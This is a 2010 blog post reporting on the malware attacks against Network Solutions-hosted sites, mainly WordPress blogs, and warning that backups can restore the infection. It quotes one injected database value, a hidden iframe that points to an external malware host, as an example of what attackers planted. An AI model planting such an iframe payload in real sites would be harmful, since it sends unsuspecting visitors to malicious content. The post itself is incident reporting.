Will A Back-Up Save Your Website or Blog After A Malware Attack?

Will A Back-Up Save Your Website or Blog After A Malware Attack?

Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010 in which a mass infection of Wordpress blogs was sustained at the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions it seemed unrelated to themes or plugins, and some employed WP-admin access blocked to all but a few selected IP’s via htpasswd, as well. The sole similarity was all were shared hosts at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.

It appeared to be an SQL injection attack, or larger issues within Network Solution databases, for the following reasons:

No files were created so that would eliminate the advantages of the more common security measures. The April 8th attack modified the “siteurl” within the wp-option table to point to a particular url. Among other things, this would completely break the layout of the site.

Here’s the code found inside blog databases:

(2, 0, ’siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.

This latest attack is widespread and impacts all sites: static HTML and blogs including Word Press and Joomla. These sites are being infected with iframe injections and encoded Javascript plus PDF exploits installed on certain sites. The encoded Javascript makes it possible for the iframe injection.

This seems to be an attack of wider scope and heightened degree of damage.

Part of the problem for many site owners results from many hosting companies maintaining their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.

Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed-up in their databases.

Related actions include Google announcing they are blacklisting as many affected sites as possible.

Tough day at Network Solutions.

Tags: blog back up, blog security, iframe injection, malware, Network Solutions security attack, security attack, website back up, Website Security

Like this post? Subscribe to my RSS feed and get loads more!